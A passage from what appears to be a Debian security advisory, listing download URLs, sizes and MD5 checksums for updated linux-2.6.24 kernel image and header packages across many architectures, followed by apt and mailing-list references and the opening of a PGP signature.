http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\r\n Size/MD5 checksum: 4260850 8b0891fa602714572b2ea8be13d4b2eb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.8etch1_all.deb\r\n Size/MD5 checksum: 96802 317936645be453126afab54705999059\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\r\n Size/MD5 checksum: 1542086 460bc638a040b2674f4da6e30fc975f1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\r\n Size/MD5 checksum: 46865722 b3afc19906294f1990ab97e6c8943285\r\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\r\n Size/MD5 checksum: 917482 dc533207197184a44dcc931372534b0b\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 82038 12269f5ccc3251bed6544c82ace6bab8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 26736698 8714134f74ad24d4a761d9e1b18c84dc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 332080 2632341b6c0d98b6798103d4e03a4980\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 26757530 c00a3280cf8bc9d18e52c64202af9e34\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 27341904 ee355aab70b9061c511e7152929c150a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 331054 7d30fb320e409180de47bdf7be8430c2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 3454072 01417e58c71bb9515a4011c390be0580\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 82010 cff77bfb7491d357acc7d9d50dc0217e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch1_alpha.deb\r\n Size/MD5 checksum: 330926 1b2c38a3628e25cc62b7e555800d48e5\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb\r\n Size/MD5 checksum: 19480638 9f9f06adb37a611ed3f24000859beb03\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_amd64.deb\r\n Size/MD5 checksum: 3654580 aac989a8eee05d7adaf9731dfdda062f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb\r\n Size/MD5 checksum: 344960 4a6f4ac493086ec243734b3b6968a2bd\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb\r\n Size/MD5 checksum: 82010 f7713fceebf11933dd20c7db1c636df0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_amd64.deb\r\n Size/MD5 checksum: 81998 7f2d31a9d80ae34c397d90912dbbb46f\r\n\r\narm architecture (ARM)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 308926 05539199c8e837c4fccc75172a9c82be\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 82136 39e67aa9c8617379a54c9f36d0d72572\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 3939598 804e621a444954f2045f27a9282ae77a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 306808 3086d994c254c2481c6610729c6ee182\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 296510 23d73ccad75398f169ad602db513b908\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 9351566 c0326566806f5c7ed8de2342f4de857a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 10775966 6661bd851503d953c4ca43b6f8e85deb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 10768304 daca396e0f5decdfe92a7724069daa50\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.8etch1_arm.deb\r\n Size/MD5 checksum: 82166 8bb034ce3157aeefe7c3c692ebe14df4\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 261644 7c1852bbe840ac3d90c12d452e2681cf\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 82016 293d2bba2cb8563e700377ada35f2ba2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 259304 f3db74269efbac5501598e35a462bf20\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 82038 bdae604446c924296cd1aac5b9be7e95\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 13332816 5d9819ffa069392df46ad94e193cbdf1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 258452 c1a9dde9f1c92b4563126d1937d4eec2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 14385162 6cbd8dc0702e5cb15237d246883dd2c0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 258378 4a864d5f74cd4f1e05362aa00e94236a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 14847618 ab5989ffb84c1780ba7a8d06ac501f67\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 3439250 22ebf43e46ee15c1240d6881c2554248\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\r\n Size/MD5 checksum: 13845394 731ba27a151e94071c8f64ceb0da9e92\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 360908 aef486d9faf9aca0e61ea01e16d0cbc8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 19348860 15a2e2dc1fa2b3b423d3010272f7f3f6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 82124 ee99a97dc91f3c2e205bce0b901904c0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 359834 d80f275632e07acaaa02679eee976bb6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 82160 07df09b3f1af03cd0f20d2b0cf2b679a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 347518 a3530c65c732ef54f207a3551c85ec9f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 19344944 28d8879c242e0698ee8524d006970445\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 361402 3bad41e46bd717ebe8d15e0473f130eb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 19589084 a8319258d3194cd59fa263a1b66a5626\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 19278254 608362b1503eb3ec838bd01152d7aa93\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_i386.deb\r\n Size/MD5 checksum: 3647296 a6ce4748c3fefd49a40ebbfed1e004f9\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 318210 76ad07637a2fac8a32d827c23f893ffa\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 32025152 eb4eec0df149a61e18ae22ef8c50eb43\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 318482 a155708aa4e74d90e54a4f107221c995\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 3567324 0e1d20a7ecbf444ad6aba30cc169963d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 82000 f66623c2c53891b0d92055fb032d0592\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 32206190 62738a79d48dffcad324124d2b73f3d4\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.8etch1_ia64.deb\r\n Size/MD5 checksum: 82028 6aa864922de84ad84cfff13eb9ce71ee\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 308452 f5d33880c20e98b12a9ad5ef53743910\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 214502 a39b0ecffd3a215979f8e5bcdcd78bfe\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 17166576 38a62721888bbb2f0fc4d7fbdba70c9e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 82062 3aa3ea6a854d046759d5824257e47bf3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 17151594 603b866be5168c042bbef832eb253c9d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 10522386 725913ed966df3029d3f72332af590fd\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 225228 e8ad107d20c67c798cdb093ae150592c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 246218 69eee0d55e37c414da07e70b90c190a9\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 11957416 9d75b25a0668735d4bfb1fac77788723\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 27772372 307325283c10af9dd6dc8cb4f0de39a7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 246310 815dfe8f02f354f03f0d63f8605bedd9\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 22150880 d183f2a93f59d18034573fd7febf5e22\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 3803446 4448552a0dd930e3d51a800c1d6deb50\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 82008 871aace093a3411d3d01dfcc19e57a7a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\r\n Size/MD5 checksum: 309908 ebc141db56c3f149eaf265af89054e03\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 3803432 926f0974edf97ded8ef4bd4f99847b35\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 245716 9a62f6221f1b1e36c8b397e5afcb966a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 82060 401c4c5fb02f54a0deacef21bf630b0e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 26982892 39032aaca4b2a6cecc7091022a42e2b7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 16629962 874a967e72aa10398626267cb2d5ba54\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 21732318 7819062b50720a60a098d086978298ea\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 82012 06886337047db3ad1df77cc919c4cff6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 246190 ec4b8f66e8a0065d694f990745049e7e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 16566324 d778d8f7f199e49cb087fafaef7eb551\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 13316760 aadc4a462ca185163c902551556c92f6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 309226 44e7866afb834db0bf71a9d034d729ba\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 308360 e53f7681e10aa6b07d1ea3e3b58622da\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mipsel.deb\r\n Size/MD5 checksum: 245984 a572ee84ea19bb4bb908e6c20a56ca37\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 19194974 99103ae37f6001139ea44dd31f84183f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 320916 0ba37f3d80f38b92b9097ea7e90fb3e7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 320840 0ab836295bc998d5b54f9d54bb2bd23c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 19485870 bbee80ba2e47827a9f8ac2360ccf9e68\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 3672412 4ff49fe861ab4f49eec95d425114c349\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 82012 03d29f46bdcab8bab20d237a294fc242\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 295058 7718f3ba536f4af7252961bbbbab24be\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 21169748 db5e60f6e3ba1fcd12a793fd30f75c14\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 17459470 60369530c57a669b6c9bcd441f757417\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 322436 779ccace55f22bdcf1ccd9212033b58d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb\r\n Size/MD5 checksum: 82046 39a3cbedcbc4e13f997b7641394e3ad0\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 1501738 7bf06e1f51092c18b512045444fba8e9\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 193848 6713da5dfd8696c27718075e6cb3fa03\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 82016 1668a7a797859f5d9e0a7af2ba1781b4\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 6950110 9f8a8d765c71aaee7e94402626f413a1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 82002 0f37b246336adf27ce4d37776257ff95\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 7200396 de8ace94802f259aef088e9384a4ca6b\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 194084 ea695f010b1916d50f1bdad2e85dd1f0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_s390.deb\r\n Size/MD5 checksum: 3429706 8a40f944fa6b7c64353d76154bded277\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 82152 88b0f93df760ac992f30c1927d0144f7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 3652306 42dda4de967328363df86bee8ba0c53b\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 13022916 93538efd19eae1488128df8a3a73b957\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 263066 c796e2fd4e51ff6a66d9eec594c81386\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 13317632 e50f9515e67c38d66c58f317bf2c9292\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 264930 a1d0ba75ee8eded18b4d97327ebd0291\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_sparc.deb\r\n Size/MD5 checksum: 82128 6c1ebe596b196e25cb0307f78ab1f358\r\n\r\n\r\n These changes will probably be included in the oldstable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 